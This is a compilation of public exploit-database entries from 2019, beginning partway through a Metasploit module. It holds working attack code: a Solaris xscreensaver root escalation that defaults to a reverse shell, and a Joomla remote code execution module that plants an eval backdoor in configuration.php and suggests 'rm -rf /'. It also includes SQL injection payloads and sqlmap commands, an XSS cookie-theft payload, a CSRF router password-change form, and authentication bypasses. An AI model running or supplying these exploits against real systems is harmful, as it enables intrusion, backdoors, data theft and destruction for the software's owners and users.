'Notes'          => { 'AKA' => ['raptor_xscreensaver'] },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Marco Ivaldi', # Discovery and exploit
'bcoles'        # Metasploit
        ],
'DisclosureDate' => '2019-10-16',
'Privileged'     => true,
'Platform'       => ['solaris', 'unix'],
'Arch'           => [ARCH_CMD],
'Targets'        => [['Auto', {}]],
'SessionTypes'   => ['shell', 'meterpreter'],
'DefaultOptions' =>
        {
'PAYLOAD'     => 'cmd/unix/reverse_ksh',
'WfsDelay'    => 10,
'PrependFork' => true
        },
'DefaultTarget'  => 0))
    register_options [
      OptString.new('XSCREENSAVER_PATH', [true, 'Path to xscreensaver executable', '/usr/bin/xscreensaver']),
      OptString.new('XORG_PATH', [true, 'Path to Xorg executable', '/usr/bin/Xorg'])
    ]
    register_advanced_options [
      OptString.new('Xdisplay', [true, 'Display to use if starting a new Xorg session', ':1']),
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def xscreensaver_path
    datastore['XSCREENSAVER_PATH']
  end

  def xorg_path
    datastore['XORG_PATH']
  end

  def mkdir(path)
    vprint_status "Creating directory '#{path}'"
    cmd_exec "mkdir -p '#{path}'"
    register_dir_for_cleanup path
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_compile(path, data)
    upload "#{path}.c", data

    output = cmd_exec "PATH=\"$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin\" gcc -fPIC -shared -s -g -O2 -lc -o #{path} #{path}.c"
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end

    register_file_for_cleanup path
  end

  def check
    unless setuid? xscreensaver_path
      vprint_error "#{xscreensaver_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{xscreensaver_path} is setuid"

    unless has_gcc?
      vprint_error 'gcc is not installed'
      return CheckCode::Safe
    end
    vprint_good 'gcc is installed'

    xscreensaver_version = cmd_exec("#{xscreensaver_path} --help").to_s.scan(/^xscreensaver ([\d\.]+)/).flatten.first
    if xscreensaver_version.to_s.eql? ''
      vprint_error 'Could not determine xscreensaver version'
      return CheckCode::Detected
    end

    # Bug introduced in version 5.06. Patched in version <~ 5.42.
    unless Gem::Version.new(xscreensaver_version).between?(Gem::Version.new('5.06'), Gem::Version.new('5.41'))
      vprint_error "xscreensaver version #{xscreensaver_version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "xscreensaver version #{xscreensaver_version} appears to be vulnerable"

    CheckCode::Appears
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless [CheckCode::Detected, CheckCode::Appears].include? check
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    # Set display
    display = cmd_exec 'echo $DISPLAY'
    kill_xorg = false

    if display.to_s.blank?
      display = datastore['Xdisplay']
      print_status "Starting Xorg on display #{display} ..."
      cmd_exec "#{xorg_path} #{display} & echo "
      kill_xorg = true
    else
      print_status "Using Xorg display #{display} ..."
    end

    # Create writable log file in /usr/lib/secure/
    lib_name = rand_text_alphanumeric 5..10
    if cmd_exec("/usr/bin/file #{xscreensaver_path}").to_s.include? 'ELF 64-bit'
      secure_path = "/usr/lib/secure/64/"
    else
      secure_path = "/usr/lib/secure/"
    end
    lib_path = "#{secure_path}#{lib_name}.so"

    print_status "Creating log file #{lib_path} ..."
    cmd_exec "umask 0; DISPLAY=#{display} #{xscreensaver_path} -display #{display} -log #{lib_path} & echo "

    Rex.sleep(5)

    cmd_exec 'pkill -U `whoami` -n xscreensaver'
    if kill_xorg
      cmd_exec 'pkill -U `whoami` -n Xorg'
    end

    unless writable? lib_path
      fail_with Failure::NotVulnerable, "Could not create writable log file #{lib_path}"
    end

    register_file_for_cleanup lib_path

    # Upload and compile shared object
    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
    mkdir base_path

    payload_name = ".#{rand_text_alphanumeric 5..10}"
    payload_path = "#{base_path}/#{payload_name}"

    so = <<-EOF
      #include <unistd.h>
      void __attribute__((constructor)) cons() {
        setuid(0);
        setgid(0);
        unlink("#{lib_path}");
        execle("#{payload_path}", "", NULL, NULL);
        _exit(0);
      }
    EOF

    so_name = ".#{rand_text_alphanumeric 5..10}"
    so_path = "#{base_path}/#{so_name}"
    upload_and_compile so_path, so

    # Overwrite newly created log file with compiled shared object
    vprint_status "Writing shared object to #{lib_path}"
    cmd_exec "cp '#{so_path}''#{lib_path}'"

    # Upload and execute payload
    if payload.arch.first.to_s == 'cmd'
      upload payload_path, "#!/bin/sh\n#{payload.encoded}"
    else
      upload payload_path, generate_payload_exe
    end
    chmod payload_path

    print_status 'Executing payload...'
    cmd_exec "LD_PRELOAD=#{lib_path} #{xscreensaver_path} --help & echo "
  end
end

# Exploit Title: Joomla! 3.4.6 - Remote Code Execution (Metasploit)
# Google Dork: N/A
# Date: 2019-10-02
# Exploit Author: Alessandro Groppo
# Vendor Homepage: https//www.joomla.it/
# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
# Version: 3.0.0 --> 3.4.6
# Tested on: Linux
# CVE : N/A

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Joomla

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Rusty Joomla Unauthenticated Remote Code Execution',
'Description'    => %q{
PHP Object Injection because of a downsize in the read/write process with the database leads to RCE.
The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter.
That's because the exploit is more reliabale (doesn't rely on common disabled function). 
For this reason, use it with caution and remember the house cleaning.
Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with 
get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy
      },
'Author'=>
        [
'Alessandro \'kiks\' Groppo @Hacktive Security', 
        ],
'License'        => MSF_LICENSE,
'References'     =>
        [
['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41'],
['URL', 'https://github.com/kiks7/rusty_joomla_rce']
        ],
'Privileged'     => false, 
'Platform'       => 'PHP',
'Arch'           => ARCH_PHP,
'Targets'        => [['Joomla 3.0.0 - 3.4.6', {}]],
'DisclosureDate' => 'Oct 02  2019',
'DefaultTarget'  => 0)
    )

    register_advanced_options(
      [
        OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
      ])
  end

  def get_random_string(length=50)
  source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a 
key=""
length.times{ key += source[rand(source.size)].to_s }
return key
  end

  def get_session_token
# Get session token from cookies
vprint_status('Getting Session Token')
res = send_request_cgi({
'method' => 'GET',
'uri'  => normalize_uri(target_uri.path) 
})

cook = res.headers['Set-Cookie'].split(';')[0]
vprint_status('Session cookie: ' + cook)
return cook
  end

  def get_csrf_token(sess_cookie)
  vprint_status('Getting CSRF Token')

  res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
'headers' => {
'Cookie' => sess_cookie,
}
  })

  html = res.get_html_document
  input_field = html.at('//form').xpath('//input')[-1]
  token = input_field.to_s.split('')[2]
  token = token.gsub('name="','').gsub('"','')
  if token then
  vprint_status('CSRF Token: ' + token)
  return token
  end
  print_error('Cannot get the CSRF Token ..')

  end

  def get_payload(function, payload)
  # @function: The PHP Function
  # @payload: The payload for the call
  template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
  # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values
  payload = 'http://l4m3rz.l337/;' + payload
  final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s)
  return final
  end


  def get_payload_backdoor(param_name) 
# return the backdoor payload
# or better, the payload that will inject and eval function in configuration.php (in the root)
# As said in other part of the code. we cannot create new .php file because we cannot use 
# the ? character because of the check on URI schema
function = 'assert'
        template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
        # This payload will append an eval() at the end of the configuration file                                                                            
        payload =  "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';"
template['PAYLOAD']  = payload 
template['LENGTH']   = payload.length.to_s
template['FUNC_NAME'] = function 
template['FUNC_LEN'] = function.length.to_s
        return template 

  end


  def check_by_exploiting
    # Check that is vulnerable by exploiting it and try to inject a printr('something')
    # Get the Session anb CidSRF Tokens
    sess_token = get_session_token()
    csrf_token = get_csrf_token(sess_token)

    print_status('Testing with a POC object payload')

    username_payload = '\\0\\0\\0' * 9
    password_payload = 'AAA";'# close the prev object
    password_payload += get_payload('print_r','IAMSODAMNVULNERABLE')# actual payload 
    password_payload += 's:6:"return":s:102:' # close cleanly the object
    res = send_request_cgi({
'uri'   => normalize_uri(target_uri.path,'/index.php/component/users'),
'method'   => 'POST',
'headers'  => 
{
'Cookie' => sess_token,
},
'vars_post' => {
'username' => username_payload,
'password' => password_payload,
'option'   => 'com_users',
'task'   => 'user.login',
csrf_token => '1',
}
    }) 
    # Redirect in order to retrieve the output
    if res.redirection then
res_redirect = send_request_cgi({
'method' => 'GET',
'uri' => res.redirection.to_s,
'headers' =>{
'Cookie' => sess_token
}
})

if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then
return true
else
return false
end

    end
    end

  def check
    # Check if the target is UP and get the current version running by info leak    
    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')})
    unless res
      print_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    # Parse XML to get the version 
    if res.code == 200 then
    xml = res.get_xml_document
    version = xml.at('version').text
    print_status('Identified version ' + version)
    if version <= '3.4.6' and version >= '3.0.0' then
    if check_by_exploiting()
return Exploit::CheckCode::Vulnerable
    else
if check_by_exploiting() then
# Try the POC 2 times. 
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
    end
    else
    return Exploit::CheckCode::Safe
    end
    else
    print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable')
    if check_by_exploiting() then
    return Exploit::CheckCode::Vulnerable
    else
    if check_by_exploiting() then
return Exploit::CheckCode::Vulnerable
    else
    return Exploit::CheckCode::Safe
    end
    end
    end
  end




  def exploit
    if check == Exploit::CheckCode::Safe && !datastore['FORCE']
      print_error('Target is not vulnerable')
      return
    end


    pwned = false
    cmd_param_name = get_random_string(50) 

    sess_token = get_session_token()
    csrf_token = get_csrf_token(sess_token)

    # In order to avoid problems with disabled functions
    # We are gonna append an eval() function at the end of the configuration.php file
    # This will not cause any problem to Joomla and is a good way to execute then PHP directly
    # cuz assert is toot annoying and with conditions that we have we cannot inject some characters
    # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor
    # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server.

    # TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file
    # Use the implanted backdoor to receive a nice little reverse shell with a PHP payload


    # Implant the backdoor
    vprint_status('Cooking the exploit ..')
    username_payload = '\\0\\0\\0' * 9
    password_payload = 'AAA";'# close the prev object
    password_payload += get_payload_backdoor(cmd_param_name)# actual payload 
    password_payload += 's:6:"return":s:102:' # close cleanly the object

    print_status('Sending exploit ..')


    res = send_request_cgi({
'uri'   => normalize_uri(target_uri.path,'/index.php/component/users'),
'method'   => 'POST',
'headers'  => {
'Cookie' => sess_token
},
'vars_post' => {
'username' => username_payload,
'password' => password_payload,
'option'   => 'com_users',
'task'   => 'user.login',
csrf_token => '1'
}
    }) 

    print_status('Triggering the exploit ..')    
    if res.redirection then
res_redirect = send_request_cgi({
'method' => 'GET',
'uri' => res.redirection.to_s,
'headers' =>{
'Cookie' => sess_token
}
})
    end

    # Ping the backdoor see if everything is ok :/
    res = send_request_cgi({
'method'     => 'POST',
'uri'     => normalize_uri(target_uri.path,'configuration.php'),
'vars_post'  => {
cmd_param_name  => 'echo \'PWNED\';'
}
})
    if res.to_s.include? 'PWNED' then
print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST')

        print_status('Now it\'s time to reverse shell')
res = send_request_cgi({
'method'     => 'POST',
'uri'     => normalize_uri(target_uri.path,'configuration.php'),
'vars_post'  => {
cmd_param_name  => payload.encoded 
}
})
    end

  end
end

# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control
# Date: 2019-10-24
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: N/A

# 1. Description:
# An issue was discovered in AUO SunVeillance Monitoring System.
# There is an incorrect access control vulnerability that can allow the attacker to 
# bypass the authentication mechanism, and upload files to the server without any authentication.

# 2. Proof of Concept:
(1) Access the picture management page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/Picture_Manage_mvc.aspx) without 
    any authentication. As a guest role, user is not allowed to upload a picture. However, there are two parameters, Act and authority, in Picture_Manage_mvc.aspx.
(2) Modify the value of parameter authority from 40 to 100. You can find out the upload button is enabled.
(3) Now you can upload a file successfully.
(4) The file which we uploaded is storing in server side. It’s means any user without authentication can upload files to server side.

Thank you for your kind assistance.

Luca

# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection
# Date: 2019-10-24
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: N/A

# 1. Description:
# AUO SunVeillance Monitoring System all versions prior to v1.1.9e that is vulnerable to SQL Injection.
# The vulnerability can allow the attacker inject maliciously SQL command to the server which allows 
# the attacker to read privileged data.

# 2. Proof of Concept:

(1) Access the sending mail page of AUO SunVeillance Monitoring System  (/Solar_Web_Portal/mvc_send_mail.aspx) without any authentication. 
    There is a parameter, MailAdd, in mvc_send_mail.aspx.
(2) Modify the value of parameter MailAdd with single quotation. The error messages contains oracle database information.
(3) By using sqlmap tools, attacker can acquire the database list which in server side.

cmd: sqlmap.py -u “https://<host>/Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=” -p MailAdd –dbs

(4) Furthermore, there are a few SQL Injection vulnerabilities in other fields.

picture_manage_mvc.aspx (parameter: plant_no)
swapdl_mvc.aspx (parameter: plant_no)
account_management.aspx (parameter: Text_Postal_Code, Text_Dis_Code)

Thank you for your kind assistance.

Luca

# Exploit Title: CWP (CentOS Control Web Panel) Store Cross Site Scripting
# Date: 25 Oct 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: 0.9.8.885
# CVE : CVE-2019-16295

+++++++++++++++++++++++++++++++++
#  Description:
+++++++++++++++++++++++++++++++++

User can add XSS payload in Directory Name , Filename , file extension in function "File Manager"

+++++++++++++++++++++++++++++++++
#  Steps to Reproduce
+++++++++++++++++++++++++++++++++

1. In user panel go to File Management --> File Manager
2. Go to "Create Directory" or "Create File" and insert XSS payload "<img src=x onerror=javascript&colon;alert&lpar;document&period;cookie&rpar;>"
3. XSS will trigger.

+++++++++++++++++++++++++++++++++
# PoC
+++++++++++++++++++++++++++++++++

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-16295.md

+++++++++++++++++++++++++++++++++
#  Timeline
+++++++++++++++++++++++++++++++++

2019-07-19: Discovered the bug
2019-07-19: Reported to vendor
2019-07-23: Vender accepted the vulnerability
2019-10-23: The vulnerability has been fixed
2019-10-25: Advisory published

+++++++++++++++++++++++++++++++++
# Discovered by
+++++++++++++++++++++++++++++++++

Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

# Exploit Title: Part-DB 0.4 - Authentication Bypass
# Date: 2019-10-26
# Author: Marvoloo
# Vendor Homepage: https://github.com/Part-DB/Part-DB/
# Software Link: https://github.com/Part-DB/Part-DB/archive/master.zip
# Version: 0.4
# Tested on: Linux
# CVE : N/A

# Discription:
# Easy authentication bypass vulnerability on the application 
# allowing the attacker to login

# url: http://localhost/login.php
# Parameter & Payload: 

'=''or'

#vulnerable file: login.php Line: 29,30 

#POC
POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Cookie: ....
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

# Exploit Title: JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path
# Google Dork: N/A
# Date: 2019-09-09
# Exploit Author: Roberto Escamilla
# Vendor Homepage:https://www.inforprograma.net/
# Software Link: https://www.inforprograma.net/
# Version:  = 0.6.0.0 wpspin.exe
# Tested on: Windows 10 Home
# CVE : N/A

###############STEPS##########################

# 1.- Install the JumpStart application on Windows 10 Home Operating System
# 2.- Open our "System Symbol" application.
# 3.- Execute the command -------wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
# 4.- The following will appear in a list: JumpStart Push-Button Service      jswpbapi     C:\Program Files (x86)\Jumpstart\jswpbapi.exe
# 5.- We proceed to verify the process using the command icacls, with which we verify the protection of the directory as shown below:

NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administradores:(I)(F)
BUILTIN\Usuarios:(I)(RX)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)

# 6.- Finally we verify using the command sc qc jswpbapi the protection of the service in which we observe that it is scalable in privileges 
# since the route contains spaces without being in quotes and is in CONTROL_ERROR normal and NOMBRE_INICIO_SERVICIO: 
# LocalSystem as it's shown in the following [SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: jswpbapi
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : JumpStart Push-Button Service
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem

Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
Date: 2019-10-25
Exploit Author: Prof. Joas Antonio
Vendor Homepage: https://www.intelbras.com/pt-br/
Software Link: http://en.intelbras.com.br/node/25896
Version: 1.0.18
Tested on: Windows
CVE : N/A

####################
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be

<html>
<body>
<form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
<input type="hidden" name="GO" value="system_password.asp">
<input type="hidden" name="SYSPSC" value="0">
<input class="text" type="password" name="SYSOPS" value="hack123"/> 
<input class="text" type="password" name="SYSPS" value="mrrobot"/> 
<input class="text" type="password" name="SYSPS2" value="mrrobot"/> 
</form>
<script>
      document.forms[0].submit();
</script>
</body>
</html>

Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
Version: 1.21
Tested on: CentOS7
CVE : N/A

# PoC: Multiple SQL Injection vulnerabilities

Parameter: start (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' RLIKE (SELECT (CASE WHEN (3201=3201) THEN 0x323031392d30312d32332030303a30303a3030 ELSE 0x28 END)) AND 'ScZt'='ScZt&end=2019-01-24 00:00:00
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6693 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6693=6693,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oFHi'='oFHi&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6752 FROM (SELECT(SLEEP(5)))ImfQ) AND 'EAnH'='EAnH&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Parameter: end (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' RLIKE (SELECT (CASE WHEN (4825=4825) THEN 0x323031392d30312d32342030303a30303a3030 ELSE 0x28 END)) AND 'xqhi'='xqhi
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 4638 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4638=4638,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OvvR'='OvvR
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 6750 FROM (SELECT(SLEEP(5)))gPYF) AND 'Xhni'='Xhni
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Parameter: title (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=Test'||(SELECT 0x68506d50 FROM DUAL WHERE 9657=9657 AND 5501=5501)||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test'||(SELECT 0x684f4b6d FROM DUAL WHERE 1515=1515 AND (SELECT 6271 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6271=6271,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Test'||(SELECT 0x72417477 FROM DUAL WHERE 3543=3543 AND (SELECT 4482 FROM (SELECT(SLEEP(5)))AnGw))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Parameter: description (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=Test&description=Test'||(SELECT 0x7570456a FROM DUAL WHERE 7753=7753 AND 5528=5528)||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test&description=Test'||(SELECT 0x4f6d6f41 FROM DUAL WHERE 6915=6915 AND (SELECT 9677 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(9677=9677,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Test&description=Test'||(SELECT 0x6a424e63 FROM DUAL WHERE 6961=6961 AND (SELECT 9467 FROM (SELECT(SLEEP(5)))jHfq))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Parameter: color (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: title=Test&description=Test&color=#0071c5' RLIKE (SELECT (CASE WHEN (2320=2320) THEN 0x23303037316335 ELSE 0x28 END)) AND 'XfIW'='XfIW&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 2035 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(2035=2035,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nWLO'='nWLO&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 7165 FROM (SELECT(SLEEP(5)))kngP) AND 'oklj'='oklj&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])